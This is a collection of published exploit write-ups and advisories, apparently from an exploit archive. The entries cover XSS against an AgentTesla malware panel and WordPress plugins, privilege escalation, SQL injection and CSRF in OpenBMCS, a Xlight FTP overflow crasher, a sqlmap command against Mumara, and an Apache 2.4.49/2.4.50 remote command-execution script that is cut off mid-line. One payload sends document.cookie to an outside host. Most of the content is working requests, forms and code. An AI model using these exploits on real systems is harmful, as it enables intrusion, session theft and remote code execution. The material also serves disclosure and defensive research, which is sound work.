<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/db9629508fda139f71f625d764c7eff7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: AgentTesla Builder Web Panel<br />Vulnerability: Cross Site Scripting (XSS)<br />Description: AgentTeslaBuilder WebUI uses "ionCube" to encode and protect its PHP code. AgentTesla panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the currently logged on user. This can result in PHPSESSID token, data theft or GEO location disclosure of the user accessing the AgentTesla panel.<br />Type: WebUI<br />MD5: db9629508fda139f71f625d764c7eff7 (Agent Tesla.exe)<br />MD5: 978509c2a3d051b43e53bba1436b7076 (login.php)<br />Vuln ID: MVID-2022-0454<br />Disclosure: 01/16/2022<br /><br />Exploit/PoC:<br />1) http://AGENT-TESLA-IP/AgentTeslaBuilder/?page=get-log&id=&title=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />2) http://AGENT-TESLA-IP/AgentTeslaBuilder/?page=get-log&id=&title="/%3E%3Cscript%3Cwindow.open("https://www.malvuln.com/stealtokens="%2bdocument.cookie)%3C/script%3E<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)<br /># Date: 11/12/2021<br /># Exploit Author: Murat DEMIRCI (@butterflyhunt3r)<br /># Vendor Homepage: https://accesspressthemes.com/<br /># Software Link: https://wordpress.org/plugins/accesspress-social-icons/<br /># Version: 1.8.2<br /># Tested on : Windows 10<br /><br />#Poc:<br /><br />1. Install Latest WordPress<br />2. Install and activate AccessPress Social Icons 1.8.2<br />3. Open plugin on the left frame and keep going "add new" field. Click "Choose icon indiviually" and fill other fields.<br />4. Enter JavaScript payload which is mentioned below into 'icon title' field and "Add Icon to list".<br /><br /><img src=x onerror=confirm('xss')> <br /><br />4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen.<br /></code></pre>
<pre><code><br />OpenBMCS 2.4 Create Admin / Remote Privilege Escalation<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: The application suffers from an insecure permissions and privilege<br />escalation vulnerability. A regular user can create administrative users<br />and/or elevate her privileges by sending an HTTP POST request to specific<br />PHP scripts in '/plugins/useradmin/' directory.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5693<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />List current ID and permissions (read):<br />---------------------------------------<br /><br />POST /plugins/useradmin/getUserDetails.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 16<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />id_list%5B%5D=17<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:56:53 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: Accept-Encoding<br />Content-Length: 692<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}]<br /><br /><br /><br />List current ID and permissions (admin):<br />----------------------------------------<br /><br />POST /plugins/useradmin/getUserDetails.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 16<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />id_list%5B%5D=18<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:56:36 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: Accept-Encoding<br />Content-Length: 725<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}]<br /><br /><br /><br />Escalate privileges:<br />--------------------<br /><br />POST /plugins/useradmin/update_user_permissions.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 702<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:58:48 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />2<br /><br /><br /><br />Create admin from read user:<br />----------------------------<br /><br />POST /plugins/useradmin/create_user.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 1010<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:18:58 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 20<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />{"status":"success"}<br /><br /><br /><br />PoC escalate from editor to admin:<br />----------------------------------<br /><br /><html><br /> <body><br /> <form action="https://192.168.1.222/plugins/useradmin/update_user_permissions.php" method="POST"><br /> <input type="hidden" name="permissions[0][permissions]" value="3" /><br /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /><br /> <input type="hidden" name="permissions[0][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[1][permissions]" value="2" /><br /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /><br /> <input type="hidden" name="permissions[1][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[2][permissions]" value="1" /><br /> <input type="hidden" name="permissions[2][moduleID]" value="core" /><br /> <input type="hidden" name="permissions[3][permissions]" value="4" /><br /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /><br /> <input type="hidden" name="permissions[3][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[4][permissions]" value="3" /><br /> <input type="hidden" name="permissions[4][moduleID]" value="history" /><br /> <input type="hidden" name="permissions[4][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[5][permissions]" value="3" /><br /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /><br /> <input type="hidden" name="permissions[6][permissions]" value="4" /><br /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /><br /> <input type="hidden" name="id" value="17" /><br /> <input type="submit" value="Esc" /><br /> </form><br /> </body><br /></html><br /><br /><br /><br />PoC create admin from editor:<br />-----------------------------<br /><br /><html><br /> <body><br /> <form action="https://192.168.1.222/plugins/useradmin/create_user.php" method="POST"><br /> <input type="hidden" name="user[username]" value="testingus2" /><br /> <input type="hidden" name="user[fullname]" value="TestName" /><br /> <input type="hidden" name="user[phone]" value="1112223333" /><br /> <input type="hidden" name="user[password]" value="Password123" /><br /> <input type="hidden" name="user[passwordConfirm]" value="Password123" /><br /> <input type="hidden" name="user[email]" value="testingus@test.tld" /><br /> <input type="hidden" name="user[expiry]" value="" /><br /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /><br /> <input type="hidden" name="permissions[0][permissions]" value="3" /><br /> <input type="hidden" name="permissions[0][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /><br /> <input type="hidden" name="permissions[1][permissions]" value="2" /><br /> <input type="hidden" name="permissions[1][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[2][moduleID]" value="core" /><br /> <input type="hidden" name="permissions[2][permissions]" value="1" /><br /> <input type="hidden" name="permissions[2][mod_home]" value="0" /><br /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /><br /> <input type="hidden" name="permissions[3][permissions]" value="4" /><br /> <input type="hidden" name="permissions[3][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[4][moduleID]" value="history" /><br /> <input type="hidden" name="permissions[4][permissions]" value="3" /><br /> <input type="hidden" name="permissions[4][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /><br /> <input type="hidden" name="permissions[5][permissions]" value="3" /><br /> <input type="hidden" name="permissions[5][mod_home]" value="0" /><br /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /><br /> <input type="hidden" name="permissions[6][permissions]" value="4" /><br /> <input type="hidden" name="permissions[6][mod_home]" value="0" /><br /> <input type="submit" value="Cre" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-11-12<br /># Vendor Homepage: https://www.xlightftpd.com/<br /># Software Link: https://www.xlightftpd.com/download/setup.exe<br /># Tested Version: 3.9.3.1<br /># Vulnerability Type: Buffer Overflow Local<br /># Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)<br /><br /># Steps to reproduce:<br /># 1. - Download and Xlight FTP<br /># 2. - Run the python script and it will create exploit.txt file.<br /># 3. - Open Xlight FTP 3.9.3.1<br /># 4. - "File and Directory - Access Control List - Setup - Added users list directories<br /># 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied<br /># 6. - Go to Setup -> added -> Enter new Item - Paste the characters <br /># 7 - Crashed<br /><br />#!/usr/bin/python<br /><br />exploit = 'A' * 550<br /><br />try: <br /> file = open("exploit.txt","w")<br /> file.write(exploit)<br /> file.close()<br /><br /> print("POC is created")<br />except:<br /> print("POC not created")<br /> <br /></code></pre>
<pre><code><br />OpenBMCS 2.4 Authenticated SQL Injection<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via<br />the 'id' GET parameter is not properly sanitised before being returned to the<br />user or used in SQL queries. This can be exploited to manipulate SQL queries<br />by injecting arbitrary SQL code.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Semen 'samincube' Rozhkov<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5692<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />The following PoC request demonstrates the issue (authenticated user session is required):<br /><br />GET /debug/obix_test.php?id=1%22 HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ssid123ssid123ssid1234ssid<br />Connection: close<br /><br /><br />Response:<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 1 Jan 2022 15:09:54 GMT<br />Server: Apache/2.4.10 (Debian)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Pragma: no-cache<br />Vary: Accept-Encoding<br />Content-Length: 629<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><br /><br /><b>Fatal error</b>: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146<br />Stack trace:<br />#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...')<br />#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true)<br />#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config')<br />#3 {main}<br /> thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br /><br /></code></pre>
<pre>
<code># Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
# Date: 11/11/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: http://www.wpsymposiumpro.com/
# Software Link: https://wordpress.org/plugins/wp-symposium-pro/
# Version: 2021.10
# Tested on : Windows 10
#Description: WP Symposium Pro version 2021.10 plugin was exposed to stored cross site scripting vulnerability due to lack of sanitizing adding forum speciality and its "name" label.
#Poc:
POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test
----------------------------------------------------------------------------------
## After adding new forum, click created forum and pop-up will be on the screen.
</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/8b855e56e41a6e10d28522a20c1e0341.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Chaos Ransomeware Builder v4<br />Vulnerability: Insecure Permissions<br />Description: The malware writes an .EXE with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 8b855e56e41a6e10d28522a20c1e0341<br />Vuln ID: MVID-2022-0456<br />Disclosure: 01/16/2022<br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/11/2022 10:08 PM 23,040 hate.exe<br /> 1 File(s) 23,040 bytes<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)<br /># Date: 2021-11-11<br /># Exploit Author: (v0yager) Shain Lakin<br /># Vendor Homepage: https://mumara.com<br /># Version: <= 2.93<br /># Tested on: CentOS 7<br /><br />-==== Vulnerability ====-<br /><br />An SQL injection vulnerability in license_update.php in Mumara Classic<br />through 2.93 allows a remote unauthenticated attacker to execute<br />arbitrary SQL commands via the license parameter.<br /><br />-==== POC ====-<br /><br />Using SQLMap:<br /><br />sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql<br /></code></pre>
<pre><code><br />OpenBMCS 2.4 CSRF Send E-mail<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: The application interface allows users to perform certain actions via<br />HTTP requests without performing any validity checks to verify the requests.<br />This can be exploited to perform certain actions with administrative privileges<br />if a logged-in user visits a malicious web site.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5691<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br /><html><br /> <body><br /> <form action="https://192.168.1.222/core/sendFeedback.php" method="POST"><br /> <input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" /><br /> <input type="hidden" name="message" value="Take me to your leader." /><br /> <input type="hidden" name="email" value="lab@zeroscience.mk" /><br /> <input type="submit" value="Send" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)<br /># Date: 11/11/2021<br /># Exploit Author: Valentin Lobstein<br /># Vendor Homepage: https://apache.org/<br /># Software Link: https://github.com/Balgogan/CVE-2021-41773<br /># Version: Apache 2.4.49/2.4.50 (CGI enabled)<br /># Tested on: Debian GNU/Linux<br /># CVE : CVE-2021-41773 / CVE-2021-42013<br /># Credits : Lucas Schnell<br /><br /><br />#!/usr/bin/env python3<br />#coding: utf-8<br /><br />import os<br />import re<br />import sys<br />import time<br />import requests<br />from colorama import Fore,Style<br /><br /><br />header = '''.[1;91m<br /> <br /> ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ <br /> ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ <br /> ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ <br /> ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ <br /> ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒<br /> ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░<br /> ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░<br /> ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ <br />''' + Style.RESET_ALL<br /><br /><br />if len(sys.argv) < 2 :<br /> print( 'Use: python3 file.py ip:port ' )<br /> sys.exit()<br /><br />def end():<br /> print("\t.[1;91m[!] Bye bye !")<br /> time.sleep(0.5)<br /> sys.exit(1)<br /><br />def commands(url,command,session):<br /> directory = mute_command(url,'pwd')<br /> user = mute_command(url,'whoami')<br /> hostname = mute_command(url,'hostname')<br /> advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')<br /> command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") <br /> command = f"echo; {command};"<br /> req = requests.Request('POST', url=url, data=command)<br /> prepare = req.prepare()<br /> prepare.url = url <br /> response = session.send(prepare, timeout=5)<br /> output = response.text<br /> print(output)<br /> if 'clear' in command:<br /> os.system('/usr/bin/clear')<br /> print(header)<br /> if 'exit' in command:<br /> end()<br /><br />def mute_command(url,command):<br /> session = requests.Session()<br /> req = requests.Request('POST', url=url, data=f"echo; {command}")<br /> prepare = req.prepare()<br /> prepare.url = url <br /> response = session.send(prepare, timeout=5)<br /> return response.text.strip()<br /><br /><br />def exploitRCE(payload):<br /> s = requests.Session()<br /> try:<br /> host = sys.argv[1]<br /> if 'http' not in host:<br /> url = 'http://'+ host + payload<br /> else:<br /> url = host + payload <br /> session = requests.Session()<br /> command = "echo; id"<br /> req = requests.Request('POST', url=url, data=command)<br /> prepare = req.prepare()<br /> prepare.url = url <br /> response = session.send(prepare, timeout=5)<br /> output = response.text<br /> if "uid" in output:<br /> choice = "Y"<br /> print( Fore.GREEN + '\n[!] Target %s is vulnerable 